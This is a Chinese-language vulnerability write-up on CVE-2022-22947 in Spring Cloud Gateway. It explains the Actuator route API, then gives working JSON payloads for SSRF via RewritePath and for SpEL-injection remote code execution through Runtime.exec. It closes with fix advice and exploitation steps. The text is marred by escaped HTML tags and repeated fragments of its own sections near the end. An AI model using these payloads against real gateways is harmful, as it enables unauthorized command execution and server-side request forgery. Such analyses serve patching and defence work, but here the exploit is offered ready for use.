Spring Cloud Gateway CVE-2022-22947漏洞分析与利用<\/h1>

1. Spring Cloud Gateway概述<\/h2>
Spring Cloud Gateway是一个基于Spring Framework 5、Project Reactor和Spring Boot 2构建的API网关，旨在为微服务架构提供简单而有效的路由功能，并支持跨领域关注点如安全、监控\/指标和弹性。<\/p>

1.1 基本架构<\/h3>

客户端请求流程<\/strong>：

客户端向Spring Cloud Gateway发送请求<\/li>
Gateway Handler Mapping确定请求是否匹配某个路由<\/li>
匹配的请求被发送到Gateway Web Handler<\/li>
处理器通过特定于请求的过滤器链处理请求<\/li>
执行所有"pre"过滤器逻辑<\/li>
发出代理请求<\/li>
执行所有"post"过滤器逻辑<\/li> <\/ol> <\/li> <\/ul>
2. 漏洞背景<\/h2>
2.1 自定义路由功能<\/h3>
Spring Cloud Gateway允许通过Actuator API动态添加路由：<\/p>

如果配置暴露了Endpoint（通过JMX或Web）<\/li>
可通过\/gateway<\/code>接口与网关交互<\/li>
通常这些Actuator接口位于内网或受Spring Boot Security保护<\/li> <\/ul> 2.2 路由配置示例<\/h3> 官方Demo示例（缺少filters部分）：<\/p> { <\/span><\/span> "predicates"<\/span>: [ <\/span><\/span> { <\/span><\/span> "name"<\/span>: "Path"<\/span>, <\/span><\/span> "args"<\/span>: { <\/span><\/span> "_genkey_0"<\/span>: "\/red\/**"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> ], <\/span><\/span> "uri"<\/span>: "http:\/\/example.com"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 漏洞利用路径<\/h2> 3.1 内置过滤器利用<\/h3> Spring Cloud Gateway提供多种内置过滤器，其中可用于SSRF的包括：<\/p> RewritePath过滤器<\/strong>：<\/p> 执行正则表达式重写<\/li> 示例：将\/red\/blue<\/code>重写为\/blue<\/code><\/li> <\/ul> <\/li> StripPrefix过滤器<\/strong><\/p> <\/li> SetPath过滤器<\/strong><\/p> <\/li> <\/ol> 3.2 SSRF利用示例<\/h3> 向actuator\/gateway\/routes\/red<\/code> POST以下数据：<\/p> { <\/span><\/span> "predicates"<\/span>: [ <\/span><\/span> { <\/span><\/span> "name"<\/span>: "Path"<\/span>, <\/span><\/span> "args"<\/span>: { <\/span><\/span> "_genkey_0"<\/span>: "\/red\/**"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> ], <\/span><\/span> "filters"<\/span>: [ <\/span><\/span> { <\/span><\/span> "name"<\/span>: "RewritePath"<\/span>, <\/span><\/span> "args"<\/span>: { <\/span><\/span> "_genkey_0"<\/span>: "\/red\/?(?<path>.*)"<\/span>, <\/span><\/span> "_genkey_1"<\/span>: "\/${path}"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> ], <\/span><\/span> "uri"<\/span>: "http:\/\/xxxx:1234"<\/span>, <\/span><\/span> "order"<\/span>: 0<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>然后POST \/actuator\/gateway\/refresh<\/code>刷新路由，即可实现SSRF。<\/p> 4. CVE-2022-22947 RCE漏洞分析<\/h2> 4.1 漏洞本质<\/h3> SPEL表达式注入<\/strong>：在路由配置解析过程中存在SpEL表达式注入漏洞<\/li> 触发点<\/strong>：org.springframework.cloud.gateway.support.ShortcutConfigurable#getValue<\/code><\/li> <\/ul> 4.2 漏洞利用Payload<\/h3> { <\/span><\/span> "id"<\/span>: "hacktest"<\/span>, <\/span><\/span> "filters"<\/span>: [{ <\/span><\/span> "name"<\/span>: "AddResponseHeader"<\/span>, <\/span><\/span> "args"<\/span>: { <\/span><\/span> "name"<\/span>: "Result"<\/span>, <\/span><\/span> "value"<\/span>: "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"<\/span> <\/span><\/span> } <\/span><\/span> }], <\/span><\/span> "uri"<\/span>: "http:\/\/example.com"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>4.3 漏洞触发条件<\/h3> 任何Filter或Predicate的配置值如果是合法的SpEL表达式<\/li> 在以下情况下会触发：程序启动时加载配置<\/li> 通过\/actuator\/gateway\/refresh<\/code>刷新路由时<\/li> <\/ul> <\/li> <\/ol> 4.4 更通用的利用方式<\/h3> { <\/span><\/span> "predicates"<\/span>: [ <\/span><\/span> { <\/span><\/span> "name"<\/span>: "Path"<\/span>, <\/span><\/span> "args"<\/span>: { <\/span><\/span> "_genkey_0"<\/span>: "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> ], <\/span><\/span> "uri"<\/span>: "http:\/\/127.0.0.1:9999"<\/span>, <\/span><\/span> "order"<\/span>: 0<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>5. 漏洞修复建议<\/h2> 升级到Spring Cloud Gateway 3.1.1+或3.0.7+版本<\/li> 限制Actuator端点的访问：禁用不必要的Actuator端点<\/li> 配置适当的访问控制<\/li> <\/ul> <\/li> 避免在生产环境开启Gateway的Actuator端点<\/li> <\/ol> 6. 漏洞验证步骤<\/h2> 检查目标是否使用受影响版本的Spring Cloud Gateway<\/li> 尝试访问\/actuator\/gateway\/routes<\/code>端点<\/li> 发送恶意路由配置<\/li> 触发路由刷新<\/li> 验证命令执行结果<\/li> <\/ol> 7. 技术原理深入<\/h2> 7.1 ShortcutConfigurable接口<\/h3> 设计目的：提供快捷配置功能<\/li> 动态路由定义：允许程序运行时定义路由，重启后失效<\/li> 配置解析：在解析配置时会评估SpEL表达式<\/li> <\/ul> 7.2 表达式注入流程<\/h3> 用户提交包含SpEL表达式的路由配置<\/li> 配置被解析并存储在内存中<\/li> 在路由加载或刷新时，ShortcutConfigurable.getValue()<\/code>方法被调用<\/li> 方法内部使用StandardEvaluationContext<\/code>评估表达式<\/li> 恶意表达式被执行，导致RCE<\/li> <\/ol> 8. 参考资源<\/h2> 官方文档：https:\/\/docs.spring.io\/spring-cloud-gateway\/docs\/current\/reference\/html\/<\/li> 漏洞分析：https:\/\/xz.aliyun.com\/t\/11033<\/li> <\/ul>

Spring Cloud Gateway CVE-2022-22947漏洞分析与利用<\/h1>

1. Spring Cloud Gateway概述<\/h2> Spring Cloud Gateway是一个基于Spring Framework 5、Project Reactor和Spring Boot 2构建的API网关，旨在为微服务架构提供简单而有效的路由功能，并支持跨领域关注点如安全、监控\/指标和弹性。<\/p>

2. 漏洞背景<\/h2>

3. 漏洞利用路径<\/h2>

7. 技术原理深入<\/h2>

8. 参考资源<\/h2> 官方文档：https:\/\/docs.spring.io\/spring-cloud-gateway\/docs\/current\/reference\/html\/<\/li> 漏洞分析：https:\/\/xz.aliyun.com\/t\/11033<\/li> <\/ul>

1. Spring Cloud Gateway概述<\/h2>
Spring Cloud Gateway是一个基于Spring Framework 5、Project Reactor和Spring Boot 2构建的API网关，旨在为微服务架构提供简单而有效的路由功能，并支持跨领域关注点如安全、监控\/指标和弹性。<\/p>

8. 参考资源<\/h2>

官方文档：https:\/\/docs.spring.io\/spring-cloud-gateway\/docs\/current\/reference\/html\/<\/li>
漏洞分析：https:\/\/xz.aliyun.com\/t\/11033<\/li> <\/ul>